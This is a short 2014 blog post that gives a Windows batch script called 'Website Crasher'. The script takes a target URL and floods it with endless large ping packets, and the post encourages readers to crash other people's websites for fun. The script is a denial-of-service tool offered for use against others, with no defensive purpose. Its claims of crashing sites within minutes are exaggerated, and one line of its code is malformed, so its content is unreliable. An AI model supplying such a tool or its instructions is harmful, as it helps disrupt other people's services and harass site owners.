Monday, May 26, 2014

Website Crashing Code

Website crashing can be fun because people will get extremely annoyed.  If you ever wanted the crash someones website then all you have to do is type in this code and wait for about 10-20 minutes.  You operate it by typing in the website URL (http:// or https:// not included) and press enter.  It will ping the website with so much data the website will not be able to process the data and send  it back in time.  Then the website becomes really slow because it is working so hard returning the ping data.  Then to end the crashing press CTRL + C.

DO NOT CLOSE THE BOX WHEN YOU ARE ENDING CRASHING!!!


:A
@echo off
Title Website Crasher
color 0e
echo Enter the website you would like to crash
set input=
set /p input= Enter your Website here:
if %input%==goto A if NOT B
echo Processing Your request
ping localhost>nul
echo To end Crashing press CTRL + C
ping localhost>nul
cls
echo ----------------------------------------------------------------------
echo Now Crashing Website...DO NOT CLOSE THIS BOX!! PRESS CRTL + C TO END!!
echo ----------------------------------------------------------------------
ping %input% -t -l 10000



No comments:

Post a Comment